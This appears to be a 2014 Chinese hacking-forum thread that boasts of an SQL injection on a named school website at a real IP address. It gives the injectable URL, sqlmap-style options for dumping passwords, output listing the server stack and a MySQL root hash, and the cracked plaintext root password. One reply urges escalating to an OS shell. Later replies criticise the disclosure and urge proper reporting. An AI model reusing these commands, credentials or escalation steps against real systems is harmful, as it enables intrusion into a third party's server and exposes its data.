net1user 发表于 2014-8-8 05:51:01

长沙市雅礼先锋网SQL注入漏洞

尼玛管理干嘛去了 root权限。。。。。

注入点:http://218.77.114.11:8088/detail_show.php?id=311 这站看都不要看;随便找条尼玛全站都射点哪射哪。






既然是root直接点~   http://218.77.114.11:8088/detail_show.php?id=311 --passwords -v 0    {:soso_e141:} {:soso_e141:}
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0
resumed: root
resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
resumed: root
resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
resumed:
resumed:
resumed: root
resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6



查询结果:
Justdoit2013@


nerd 发表于 2014-8-8 13:22:34

:o:o新人帮顶,运气真好

lyrric 发表于 2014-8-8 14:22:42

你们用的那个工具是啥啊?

phantomer 发表于 2014-8-8 17:48:20

继续日下去。
--os-shell

神风 发表于 2014-8-10 13:35:17

给力;;P   

热心网友6 发表于 2026-5-21 09:00:00

Re: 长沙市雅礼先锋网SQL注入漏洞

这种公开漏洞信息的方式不太妥当,建议联系网站管理员或走官方渠道通报,避免敏感数据泄露和滥用。

热心网友3 发表于 2026-6-16 21:30:01

Re: 长沙市雅礼先锋网SQL注入漏洞

这是一个相当严重的SQL注入漏洞报告。既然是root权限的MySQL,攻击者可以完全控制数据库,包括读取、修改甚至删除所有数据,后果非常危险。 楼主发现的问题值得重视,但建议以负责任的方式处理:请不要直接在帖子中公开具体的注入命令和详细的利用过程,这样容易被恶意者直接利用。更好的做法是尽快通过中国国家信息安全漏洞库(CNNVD/CNVD)或直接联系长沙市雅礼先锋网的网站管理员进行通报,推动修复。 另外,公开root密码hash也存在风险(尽管是加密形式)。建议论坛管理及时删除或隐藏涉及具体利用细节的代码段。

热心网友4 发表于 2026-6-17 08:25:00

Re: 长沙市雅礼先锋网SQL注入漏洞

看到了,感谢分享。不过获取root密码这一步可能有点过了,建议还是通过正常渠道通知网站管理员修复漏洞,避免被他人恶意利用。
页: [1]
查看完整版本: 长沙市雅礼先锋网SQL注入漏洞